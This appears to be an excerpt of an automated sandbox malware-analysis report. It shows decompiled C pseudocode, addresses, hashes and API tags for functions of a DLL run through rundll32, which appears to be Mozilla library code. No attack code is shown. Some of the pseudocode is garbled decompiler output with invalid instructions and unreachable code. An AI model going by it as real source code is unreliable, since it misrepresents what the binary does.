                                                                                                                                              0x180033a19
                                                                                                                                              0x180033a1c
                                                                                                                                              0x180033a24
                                                                                                                                              0x180033a27
                                                                                                                                              0x180033a30
                                                                                                                                              0x180033a3e
                                                                                                                                              0x180033a3f
                                                                                                                                              0x180033a40
                                                                                                                                              0x180033a41
                                                                                                                                              0x180033a43
                                                                                                                                              0x180033a4f
                                                                                                                                              0x180033a56
                                                                                                                                              0x180033a59
                                                                                                                                              0x180033a64
                                                                                                                                              0x180033a70
                                                                                                                                              0x180033a77
                                                                                                                                              0x180033a7a
                                                                                                                                              0x180033a85
                                                                                                                                              0x180033a8a
                                                                                                                                              0x180033a8b
                                                                                                                                              0x180033a8c
                                                                                                                                              0x180033a8d
                                                                                                                                              0x180033a8e
                                                                                                                                              0x180033a8f
                                                                                                                                              0x180033a97
                                                                                                                                              0x180033a9b
                                                                                                                                              0x180033aa8
                                                                                                                                              0x180033ab3
                                                                                                                                              0x180033abc
                                                                                                                                              0x180033ac0
                                                                                                                                              0x180033ac7
                                                                                                                                              0x180033ace
                                                                                                                                              0x180033adc
                                                                                                                                              0x180033ae2
                                                                                                                                              0x180033aea
                                                                                                                                              0x180033af8
                                                                                                                                              0x180033aff
                                                                                                                                              0x180033b09
                                                                                                                                              0x180033b0e
                                                                                                                                              0x180033b16
                                                                                                                                              0x180033b22
                                                                                                                                              0x180033b32
                                                                                                                                              0x180033b36
                                                                                                                                              0x180033b40
                                                                                                                                              0x180033b47
                                                                                                                                              0x180033b4e
                                                                                                                                              0x180033b55
                                                                                                                                              0x180033b5f
                                                                                                                                              0x180033b63
                                                                                                                                              0x180033b68
                                                                                                                                              0x180033b70
                                                                                                                                              0x180033b7d
                                                                                                                                              0x180033b80
                                                                                                                                              0x180033b85
                                                                                                                                              0x180033b91
                                                                                                                                              0x180033b96
                                                                                                                                              0x180033b9e
                                                                                                                                              0x180033bab
                                                                                                                                              0x180033bb5
                                                                                                                                              0x180033bbe
                                                                                                                                              0x180033bd1
                                                                                                                                              0x180033bde

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(aBytes <= RemainingBytes())$MOZ_RELEASE_ASSERT(aBytes <= aReader.RemainingBytes())
                                                                                                                                              • API String ID: 2882836952-3395771315
                                                                                                                                              • Opcode ID: 174ed83f828cc74a664640444545248996d36b3b265a9fbf57a73029e99829ef
                                                                                                                                              • Instruction ID: c554f38db63e049ea1cae64e90ba7310ef6d14a88f5f0fa823d2bbc2bbd659bd
                                                                                                                                              • Opcode Fuzzy Hash: 174ed83f828cc74a664640444545248996d36b3b265a9fbf57a73029e99829ef
                                                                                                                                              • Instruction Fuzzy Hash: 45B18D32314B8882EBAADB16E4853DAB360F788BE4F419115EF9D07795DF38C699C740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800138D0 Relevance: 6.3, APIs: 4, Instructions: 260threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                              			E000000011800138D0(void* __rcx) {
				signed int _v32;
				long long _v40;
				char _v56;
				long long _v64;
				void* _t49;
				signed long long _t63;
				long long _t64;
				long long _t66;
				intOrPtr _t69;
				long long* _t71;
				signed int* _t74;
				long long _t78;
				intOrPtr* _t80;
				intOrPtr _t91;
				intOrPtr _t98;
				void* _t100;
				signed long long _t102;

				_t100 = __rcx;
				_t74 =  *0x8011f718; // 0x18017b428
				_t63 =  *_t74 ^ _t102;
				_v32 = _t63;
				if ( *((char*)(__rcx + 0x70)) == 0) goto 0x80013906;
				GetCurrentThreadId();
				0x80047230();
				 *(__rcx + 0x60) = _t63;
				if ( *((long long*)(__rcx + 0x78)) == 0) goto 0x80013a8b;
				_t64 =  *((intOrPtr*)(__rcx + 0xa0));
				 *((long long*)(__rcx + 0xb0)) = _t64;
				 *((long long*)(__rcx + 0xa8)) = _t64;
				 *((long long*)(__rcx + 0xb8)) = 0;
				 *((long long*)(__rcx + 0xc0)) = 0;
				 *((long long*)(__rcx + 0xc8)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x78)))) + 0x40))();
				_t66 = _v64;
				if (_t66 == 0) goto 0x800139f1;
				asm("xorps xmm0, xmm0");
				_t78 = _t66;
				asm("movups [ecx], xmm0");
				 *((long long*)(_t78 + 0x10)) = 0;
				 *((short*)(_t78 + 0x18)) = 1;
				asm("movups [ecx+0x24], xmm0");
				if ( *((intOrPtr*)(_t78 + 0x38)) != 0) goto 0x80013970;
				_t80 = __rcx + 0x90;
				_t91 =  *((intOrPtr*)(__rcx + 0x90));
				if (_t91 == 0) goto 0x800139cf;
				asm("o16 nop [cs:eax+eax]");
				if ( *((intOrPtr*)(_t91 + 0x38)) != 0) goto 0x800139b0;
				_v64 = 0;
				 *((long long*)(_t91 + 0x38)) = _t66;
				 *_t80 = 0;
				_t97 =  *_t80;
				if ( *_t80 == 0) goto 0x800139f1;
				E00000001180023700(_t97);
				E00000001180004500( *_t80, _t97);
				_t98 =  *((intOrPtr*)(_t100 + 0x88));
				if (_t98 == 0) goto 0x80013abc;
				E00000001180052CE0(1,  &_v56);
				 *((long long*)(_t98 + 0x18)) = _v40;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi+0x8], xmm0");
				_t69 =  *((intOrPtr*)(_t100 + 0x88));
				asm("xorps xmm0, xmm0");
				asm("movups [eax], xmm0");
				 *((long long*)(_t69 + 0x10)) = 0;
				 *((short*)(_t69 + 0x18)) = 1;
				asm("movups [eax+0x24], xmm0");
				 *((long long*)( *((intOrPtr*)(_t100 + 0x88)) + 0x28)) =  *((intOrPtr*)(_t100 + 0xa0));
				_t71 =  *((intOrPtr*)(_t100 + 0x88));
				 *((intOrPtr*)(_t100 + 0xa0)) =  *((intOrPtr*)(_t100 + 0xa0)) +  *((intOrPtr*)(_t71 + 0x20));
				 *_t71 = 0;
				_t99 = _v64;
				_v64 = 0;
				if (_v64 == 0) goto 0x80013a8b;
				E00000001180023700(_t99);
				_t49 = E00000001180004500(_v64, _t99);
				if ( *((char*)(_t100 + 0x70)) == 0) goto 0x80013aa4;
				 *((long long*)(_t100 + 0x60)) = 0;
				0x80047280();
				if ( *_t74 != (_v32 ^ _t102)) goto 0x80013b0e;
				return _t49;
			}




















                                                                                                                                              0x1800138d7
                                                                                                                                              0x1800138da
                                                                                                                                              0x1800138e4
                                                                                                                                              0x1800138e7
                                                                                                                                              0x1800138f0
                                                                                                                                              0x1800138f2
                                                                                                                                              0x1800138fe
                                                                                                                                              0x180013903
                                                                                                                                              0x18001390b
                                                                                                                                              0x180013911
                                                                                                                                              0x180013918
                                                                                                                                              0x18001391f
                                                                                                                                              0x180013926
                                                                                                                                              0x180013931
                                                                                                                                              0x18001393c
                                                                                                                                              0x180013956
                                                                                                                                              0x180013959
                                                                                                                                              0x180013961
                                                                                                                                              0x180013967
                                                                                                                                              0x18001396a
                                                                                                                                              0x180013970
                                                                                                                                              0x180013973
                                                                                                                                              0x18001397b
                                                                                                                                              0x180013981
                                                                                                                                              0x18001398c
                                                                                                                                              0x18001398e
                                                                                                                                              0x180013995
                                                                                                                                              0x18001399f
                                                                                                                                              0x1800139a1
                                                                                                                                              0x1800139ba
                                                                                                                                              0x1800139bc
                                                                                                                                              0x1800139c5
                                                                                                                                              0x1800139cf
                                                                                                                                              0x1800139d6
                                                                                                                                              0x1800139df
                                                                                                                                              0x1800139e4
                                                                                                                                              0x1800139ec
                                                                                                                                              0x1800139f1
                                                                                                                                              0x1800139fb
                                                                                                                                              0x180013a08
                                                                                                                                              0x180013a12
                                                                                                                                              0x180013a16
                                                                                                                                              0x180013a1b
                                                                                                                                              0x180013a1f
                                                                                                                                              0x180013a26
                                                                                                                                              0x180013a29
                                                                                                                                              0x180013a2c
                                                                                                                                              0x180013a34
                                                                                                                                              0x180013a3a
                                                                                                                                              0x180013a4c
                                                                                                                                              0x180013a50
                                                                                                                                              0x180013a5a
                                                                                                                                              0x180013a61
                                                                                                                                              0x180013a68
                                                                                                                                              0x180013a6d
                                                                                                                                              0x180013a79
                                                                                                                                              0x180013a7e
                                                                                                                                              0x180013a86
                                                                                                                                              0x180013a8f
                                                                                                                                              0x180013a91
                                                                                                                                              0x180013a9f
                                                                                                                                              0x180013ab2
                                                                                                                                              0x180013abb

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread$ConditionInitializeVariable
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1407629574-0
                                                                                                                                              • Opcode ID: 98abc3f7b00883d85d46cb2902a75d297e7ed87c3d7ca23e7fe29a7a2e43597e
                                                                                                                                              • Instruction ID: 8d07018aadcc25554915efadea5783d424384c2ef72d15d9a493157f2e6c7d57
                                                                                                                                              • Opcode Fuzzy Hash: 98abc3f7b00883d85d46cb2902a75d297e7ed87c3d7ca23e7fe29a7a2e43597e
                                                                                                                                              • Instruction Fuzzy Hash: 38C1A132614F8882EBA6CB25E4453EA77A1F78DBD4F159204EB9E47791DF38D289C340
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180042570 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                              			E00000001180042570(long long* __rcx, long long __rdx, void* __r8) {
				signed int _v56;
				void* _v104;
				long long _v120;
				void* _t14;
				void* _t15;
				void* _t16;
				signed long long _t24;
				long long _t43;
				signed long long _t44;
				long long _t48;
				signed int* _t49;

				_t44 =  &_v104;
				_t48 = __rdx;
				_t49 =  *0x8011f718; // 0x18017b428
				_t24 =  *_t49 ^ _t44;
				_v56 = _t24;
				if ( *0x8017c0f8 == 0) goto 0x80042658;
				_v120 = _t43;
				r8d = _t15;
				E000000011800426E0( &_v104, __r8);
				if ( *0x8017c040 == 0) goto 0x80042692;
				EnterCriticalSection(??);
				E000000011800428C0(0x8017cbd8,  &_v104);
				if (_t24 == 0) goto 0x80042619;
				_t14 = E00000001180042F30(_t16, _t24,  &_v104);
				if (_t24 == 0) goto 0x80042619;
				 *__rcx = _t48;
				 *(__rcx + 8) = _t24;
				 *((char*)(__rcx + 0x10)) = 1;
				goto 0x80042627;
				asm("xorps xmm0, xmm0");
				asm("movups [esi], xmm0");
				 *((long long*)(__rcx + 0x10)) = 0;
				LeaveCriticalSection(??);
				if ( *_t49 != (_v56 ^ _t44)) goto 0x800426d6;
				return _t14;
			}














                                                                                                                                              0x180042578
                                                                                                                                              0x180042582
                                                                                                                                              0x180042588
                                                                                                                                              0x180042592
                                                                                                                                              0x180042595
                                                                                                                                              0x1800425a2
                                                                                                                                              0x1800425ae
                                                                                                                                              0x1800425ba
                                                                                                                                              0x1800425c0
                                                                                                                                              0x1800425cd
                                                                                                                                              0x1800425da
                                                                                                                                              0x1800425ec
                                                                                                                                              0x1800425f4
                                                                                                                                              0x180042603
                                                                                                                                              0x18004260a
                                                                                                                                              0x18004260c
                                                                                                                                              0x18004260f
                                                                                                                                              0x180042613
                                                                                                                                              0x180042617
                                                                                                                                              0x180042619
                                                                                                                                              0x18004261c
                                                                                                                                              0x18004261f
                                                                                                                                              0x18004262e
                                                                                                                                              0x180042642
                                                                                                                                              0x180042657

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInfoInitializeLeaveSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4213993716-0
                                                                                                                                              • Opcode ID: 6400cfecf49813b2c029d59930b1eddb8d89061fa0b15fb3c45a889f475149f3
                                                                                                                                              • Instruction ID: c6c7da5ec91c2b0d07134e049729af888c0eca0804e714bb45571d67b0f9d22a
                                                                                                                                              • Opcode Fuzzy Hash: 6400cfecf49813b2c029d59930b1eddb8d89061fa0b15fb3c45a889f475149f3
                                                                                                                                              • Instruction Fuzzy Hash: 26417E31315A4881FAD2DB21EC957E96360B79D7D8F81C016BD4D536A5EE38C78DC740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800F49B0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                              			E000000011800F49B0(void* __eflags, signed int __rax, void* __rcx, long long __rdx, long long __r8, long long __r9, char _a16, long long _a24, long long _a32) {
				long long _v24;
				struct _CRITICAL_SECTION* __rbx;
				struct _CRITICAL_SECTION* __rdi;
				void* __rsi;
				intOrPtr* __r14;
				signed char _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t24;
				void* _t33;
				void* _t35;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				 *(__rax | 0x00045f48) =  *(__rax | 0x00045f48) + _t17;
				0x8011d580(_t33, _t35);
				_t24 =  &_a16;
				_v24 = _t24;
				_t19 = E000000011800EA980(_t17 & 0x00000020, _t24, __rcx, __r8);
				 *_t24 =  *_t24 + _t19;
				 *((intOrPtr*)(_t24 - 0x77)) =  *((intOrPtr*)(_t24 - 0x77)) + _t20;
				return _t19;
				__rax =  *__rdx;
				__al = __al + bpl;
				_push(__rsi);
				__al =  *__rdx;
				spl = spl + __cl;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				__rsp = __rsp - 0x28;
				__rsi = 0;
				if ( *0x8017b4b8 == 0) goto 0x800f4a98;
				__r14 = __rdx;
				__rbx = __rcx;
				__rcx = 0x1;
				__al =  *__rdx + bpl;
				__dl = __dl | dil;
				asm("lock dec dword [eax-0x7b]");
				 *0x00000048 =  *0x00000048 << 0x89;
				asm("invalid");
				asm("sbb [ecx+ecx*4+0x70], cl");
				 *( *__rdx - 0x73) =  *( *__rdx - 0x73) | __cl;
				asm("sbb eax, 0x86a53");
				__rcx = __rbx;
				EnterCriticalSection(__rbx);
				__rax =  *0x8017b4e8; // 0x0
				 *((long long*)(__rdi + 0x10)) = __rax;
				 *0x8017b4e8 = __rdi;
				__rcx = __rbx;
				LeaveCriticalSection(__rdi);
				goto 0x800f4a98;
				__rsi = 0xffffffff;
				asm("les ebp, [eax]");
				 *((intOrPtr*)(__rbx + 0x5f)) =  *((intOrPtr*)(__rbx + 0x5f)) - __bl;
				__rsi = __rsi;
				__r14 = __r14;
				return __eax;
			}














                                                                                                                                              0x1800f49b9
                                                                                                                                              0x1800f49be
                                                                                                                                              0x1800f49c3
                                                                                                                                              0x1800f49e6
                                                                                                                                              0x1800f49eb
                                                                                                                                              0x1800f49f0
                                                                                                                                              0x1800f49f5
                                                                                                                                              0x1800f4a0c
                                                                                                                                              0x1800f4a1a
                                                                                                                                              0x1800f4a1c
                                                                                                                                              0x1800f4a1f
                                                                                                                                              0x1800f4a22
                                                                                                                                              0x1800f4a24
                                                                                                                                              0x1800f4a26
                                                                                                                                              0x1800f4a27
                                                                                                                                              0x1800f4a29
                                                                                                                                              0x1800f4a2b
                                                                                                                                              0x1800f4a2c
                                                                                                                                              0x1800f4a2d
                                                                                                                                              0x1800f4a2e
                                                                                                                                              0x1800f4a2f
                                                                                                                                              0x1800f4a35
                                                                                                                                              0x1800f4a39
                                                                                                                                              0x1800f4a42
                                                                                                                                              0x1800f4a44
                                                                                                                                              0x1800f4a47
                                                                                                                                              0x1800f4a49
                                                                                                                                              0x1800f4a52
                                                                                                                                              0x1800f4a54
                                                                                                                                              0x1800f4a56
                                                                                                                                              0x1800f4a5a
                                                                                                                                              0x1800f4a5f
                                                                                                                                              0x1800f4a61
                                                                                                                                              0x1800f4a65
                                                                                                                                              0x1800f4a68
                                                                                                                                              0x1800f4a6d
                                                                                                                                              0x1800f4a70
                                                                                                                                              0x1800f4a76
                                                                                                                                              0x1800f4a7d
                                                                                                                                              0x1800f4a81
                                                                                                                                              0x1800f4a88
                                                                                                                                              0x1800f4a8b
                                                                                                                                              0x1800f4a91
                                                                                                                                              0x1800f4a93
                                                                                                                                              0x1800f4a9c
                                                                                                                                              0x1800f4a9d
                                                                                                                                              0x1800f4aa0
                                                                                                                                              0x1800f4aa1
                                                                                                                                              0x1800f4aa3

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID: execute once failure in __cxa_get_globals_fast()$libc++abi:
                                                                                                                                              • API String ID: 3168844106-362351471
                                                                                                                                              • Opcode ID: 25c3d048fd0a697fb9d787e9c3b5da758820feb506194b646bdff96410e848e3
                                                                                                                                              • Instruction ID: 0fef4ed1f956e36c23e69558093b398bc54af63321b32ac6623f3bb01c9ba2df
                                                                                                                                              • Opcode Fuzzy Hash: 25c3d048fd0a697fb9d787e9c3b5da758820feb506194b646bdff96410e848e3
                                                                                                                                              • Instruction Fuzzy Hash: 45219F31305B5842E6969B55FC483D9A3A5E78D7E0F118138EE4E077D5DE38C6598700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180052CE0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2796706680-0
                                                                                                                                              • Opcode ID: 9990196fac0095f38a675affc5e8c5f166aa337ddf5210490abdcb69e919b12b
                                                                                                                                              • Instruction ID: edc212ff933cd7894c574b3a2c5bb10877f1e646e51f745ffae3319417172016
                                                                                                                                              • Opcode Fuzzy Hash: 9990196fac0095f38a675affc5e8c5f166aa337ddf5210490abdcb69e919b12b
                                                                                                                                              • Instruction Fuzzy Hash: 14114C32315B4C81EAA2CB15FC9839967A0B7AD7A4F449521E95D03B74DF3DD28EC310
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800426E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                              			E000000011800426E0(long long* __rcx, void* __r9, intOrPtr _a40) {
				signed int _v64;
				intOrPtr _t15;
				signed int _t16;
				void* _t29;
				intOrPtr _t40;
				void* _t43;
				void* _t53;
				void* _t55;
				void* _t62;
				signed long long _t63;
				long long _t66;
				intOrPtr _t67;
				signed long long _t73;
				signed int* _t76;

				_t76 =  *0x8011f718; // 0x18017b428
				_v64 =  *_t76 ^ _t73;
				if (__r9 == 0) goto 0x800427ee;
				_t67 = _a40;
				if (_t67 == 0) goto 0x800427ee;
				r15d = r8d;
				if ( *0x8017c0f8 == 0) goto 0x80042847;
				_t69 =  >=  ? __r9 - _t67 : 0;
				_t63 =  *0x8017ea6c;
				_t70 =  <  ? 0x100000 :  >=  ? __r9 - _t67 : 0;
				_t15 =  *0x8017c100;
				if (_t15 == 0) goto 0x80042881;
				_t40 =  *0x8017ea70;
				_t62 = __r9 + _t67;
				_t53 =  >=  ? _t62 : 0;
				_t54 =  <  ? _t40 : _t53;
				_t55 =  <  ? _t40 :  <  ? _t40 : _t53;
				_t29 = _t55 - _t62;
				if (_t29 < 0) goto 0x800427ee;
				_t43 = (_t63 - 0x00000001 &  ~( <  ? 0x100000 :  >=  ? __r9 - _t67 : 0)) + ( <  ? 0x100000 :  >=  ? __r9 - _t67 : 0);
				_t72 =  >=  ? _t55 - _t62 : 0;
				_t65 =  ~_t63 & ( >=  ? _t55 - _t62 : 0);
				_t66 = ( ~_t63 & ( >=  ? _t55 - _t62 : 0)) - _t43;
				if (_t29 <= 0) goto 0x800427ee;
				if (((r15d & 0xffffff00 | _t66 != 0xffffffff) & (_t16 & 0xffffff00 | _t43 != 0x00000000)) != ((_t16 & 0xffffff00 | _t43 != 0x00000000) & 0xffffff00 | _t66 != 0xffffffff)) goto 0x80042821;
				 *__rcx = _t66;
				 *((long long*)(__rcx + 8)) = 0x1;
				 *((char*)(__rcx + 0x10)) = 1;
				goto 0x800427ff;
				asm("xorps xmm0, xmm0");
				asm("inc ecx");
				 *((long long*)(__rcx + 0x10)) = 0;
				if ( *_t76 != (_v64 ^ _t73)) goto 0x80042842;
				return _t15;
			}

















                                                                                                                                              0x1800426f1
                                                                                                                                              0x1800426fe
                                                                                                                                              0x180042706
                                                                                                                                              0x18004270c
                                                                                                                                              0x180042715
                                                                                                                                              0x18004271e
                                                                                                                                              0x180042729
                                                                                                                                              0x180042739
                                                                                                                                              0x180042750
                                                                                                                                              0x180042756
                                                                                                                                              0x18004275a
                                                                                                                                              0x180042762
                                                                                                                                              0x180042768
                                                                                                                                              0x180042774
                                                                                                                                              0x180042777
                                                                                                                                              0x18004277e
                                                                                                                                              0x180042785
                                                                                                                                              0x18004278c
                                                                                                                                              0x18004278f
                                                                                                                                              0x18004279e
                                                                                                                                              0x1800427a6
                                                                                                                                              0x1800427ad
                                                                                                                                              0x1800427b0
                                                                                                                                              0x1800427b3
                                                                                                                                              0x1800427cf
                                                                                                                                              0x1800427dd
                                                                                                                                              0x1800427e1
                                                                                                                                              0x1800427e6
                                                                                                                                              0x1800427ec
                                                                                                                                              0x1800427ee
                                                                                                                                              0x1800427f1
                                                                                                                                              0x1800427f6
                                                                                                                                              0x18004280d
                                                                                                                                              0x180042820

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • MOZ_RELEASE_ASSERT((!elements && extentSize == 0) || (elements && extentSize != dynamic_extent)), xrefs: 0000000180042821
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoSystem
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT((!elements && extentSize == 0) || (elements && extentSize != dynamic_extent))
                                                                                                                                              • API String ID: 31276548-2301055464
                                                                                                                                              • Opcode ID: 24a5c8b165f04769a924405cf8ffb0cbe5dcb8d0df731ed8e06bd7ac0c7a5924
                                                                                                                                              • Instruction ID: 7634e482a16e6d57c4138fb8f702f737fe35fb5b8057dabb9f8bd41c914b1717
                                                                                                                                              • Opcode Fuzzy Hash: 24a5c8b165f04769a924405cf8ffb0cbe5dcb8d0df731ed8e06bd7ac0c7a5924
                                                                                                                                              • Instruction Fuzzy Hash: 2641D132306A4C86FA93DB51ED583E82390A75C7E4F4A8125BC5D477E5EE6CD68EC340
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000000018003C730 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                              			E0000000118003C730(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a40, long long _a48) {
				signed int _v32;
				char _v40;
				char _v44;
				long long _v56;
				char _v64;
				long long _v72;
				char _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				char _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				long long _v152;
				char _v160;
				long long _v168;
				long _t33;
				void* _t34;
				long long _t38;
				long long _t39;
				signed int* _t44;
				long long _t46;
				intOrPtr _t50;
				signed long long _t60;

				_t38 = _a48;
				_t46 = _a40;
				_t44 =  *0x8011f718; // 0x18017b428
				_v32 =  *_t44 ^ _t60;
				_v120 = __rdx;
				_v112 = __r8;
				_v104 = __r9;
				_v96 = _t46;
				_v88 = _t38;
				_v160 = __rdx;
				_v152 = __r8;
				_v144 = __r9;
				_v136 = _t46;
				_v128 = _t38;
				_v40 = __rcx;
				if ( *((char*)(__rcx + 0x70)) == 0) goto 0x8003c7b6;
				_t33 = GetCurrentThreadId();
				0x80047230();
				 *((long long*)(__rcx + 0x60)) = _t38;
				_t39 =  &_v44;
				_v64 = _t39;
				_v56 =  &_v120;
				_v80 = _t39;
				_v72 =  &_v160;
				_v168 = 1;
				_t34 = E0000000118003DC10(_t33, __rcx,  &_v64,  &_v80,  &_v40);
				_t50 = _v40;
				if ( *((char*)(_t50 + 0x70)) == 0) goto 0x8003c82c;
				 *((long long*)(_t50 + 0x60)) = 0;
